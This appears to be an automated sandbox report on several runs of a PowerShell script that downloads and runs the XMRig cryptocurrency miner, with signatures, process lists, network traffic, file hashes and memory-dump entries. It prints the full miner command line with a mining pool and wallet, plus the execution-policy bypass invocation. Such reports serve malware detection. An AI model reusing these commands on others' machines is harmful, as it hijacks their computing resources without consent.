memory/2032-134-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-135-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-136-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-137-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-138-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-139-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-140-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-141-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-142-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-143-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-144-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-145-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-146-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-147-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-148-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-149-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-150-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-151-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-152-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-153-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-154-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-155-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

memory/2032-156-0x00007FF7818C0000-0x00007FF7824F3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:45

Platform

win11-20240508-en

Max time kernel

1796s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1100-0-0x00007FFC11C53000-0x00007FFC11C55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u30dmdyv.hgn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1100-9-0x000001D3FC6A0000-0x000001D3FC6C2000-memory.dmp

memory/1100-10-0x00007FFC11C50000-0x00007FFC12712000-memory.dmp

memory/1100-11-0x00007FFC11C50000-0x00007FFC12712000-memory.dmp

memory/1100-12-0x00007FFC11C50000-0x00007FFC12712000-memory.dmp

memory/1100-14-0x000001D3FCCB0000-0x000001D3FCCC2000-memory.dmp

memory/1100-15-0x000001D3FCC70000-0x000001D3FCC7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1340-46-0x0000017650010000-0x0000017650030000-memory.dmp

memory/1340-47-0x0000017650050000-0x0000017650070000-memory.dmp

memory/1100-48-0x00007FFC11C53000-0x00007FFC11C55000-memory.dmp

memory/1100-49-0x00007FFC11C50000-0x00007FFC12712000-memory.dmp

memory/1340-50-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1100-51-0x00007FFC11C50000-0x00007FFC12712000-memory.dmp

memory/1340-53-0x0000017650090000-0x00000176500B0000-memory.dmp

memory/1340-52-0x0000017650070000-0x0000017650090000-memory.dmp

memory/1340-54-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-55-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-56-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-57-0x0000017650070000-0x0000017650090000-memory.dmp

memory/1340-58-0x0000017650090000-0x00000176500B0000-memory.dmp

memory/1340-59-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-60-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-61-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-62-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-63-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-64-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-65-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-66-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-67-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-68-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-69-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-70-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-71-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-72-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-73-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-74-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-75-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-76-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-77-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-78-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-79-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-80-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-81-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-82-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-83-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-84-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-85-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-86-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-87-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-88-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-89-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-90-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-91-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-92-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-93-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-94-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-95-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-96-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-97-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-98-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-99-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-100-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-101-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-102-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-103-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-104-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-105-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-106-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-107-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-108-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-109-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-110-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-111-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-112-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-113-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-114-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-115-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-116-0x00007FF779850000-0x00007FF77A483000-memory.dmp

memory/1340-117-0x00007FF779850000-0x00007FF77A483000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

memory/996-0-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jjemn3ph.ayq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/996-10-0x00000229608A0000-0x00000229608C2000-memory.dmp

memory/996-11-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/996-12-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/996-14-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/996-15-0x0000022960910000-0x0000022960922000-memory.dmp

memory/996-16-0x0000022960880000-0x000002296088A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2468-47-0x000002C2D8FC0000-0x000002C2D8FE0000-memory.dmp

memory/2468-48-0x000002C2DA8B0000-0x000002C2DA8D0000-memory.dmp

memory/2468-49-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/996-50-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp

memory/2468-52-0x000002C2DA8F0000-0x000002C2DA910000-memory.dmp

memory/2468-51-0x000002C2DA8D0000-0x000002C2DA8F0000-memory.dmp

memory/2468-53-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/996-54-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/996-55-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/2468-56-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-59-0x000002C2DA8F0000-0x000002C2DA910000-memory.dmp

memory/2468-58-0x000002C2DA8D0000-0x000002C2DA8F0000-memory.dmp

memory/2468-57-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-60-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-61-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-62-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-63-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-64-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-65-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-66-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-67-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-68-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-69-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-70-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-71-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-72-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-73-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-74-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-75-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-76-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-77-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-78-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-79-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-80-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-81-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-82-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-83-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-84-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-85-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-86-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-87-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-88-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-89-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-90-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-91-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-92-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-93-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-94-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-95-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-96-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-97-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-98-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-99-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-100-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-101-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-102-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-103-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-104-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-105-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-106-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-107-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-108-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-109-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-110-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-111-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-112-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-113-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-114-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-115-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-116-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-117-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

memory/2468-118-0x00007FF7D5250000-0x00007FF7D5E83000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:40

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/2820-0-0x00007FFD5EBC3000-0x00007FFD5EBC4000-memory.dmp

memory/2820-5-0x0000028BD0290000-0x0000028BD02B2000-memory.dmp

memory/2820-8-0x0000028BD0440000-0x0000028BD04B6000-memory.dmp

memory/2820-9-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

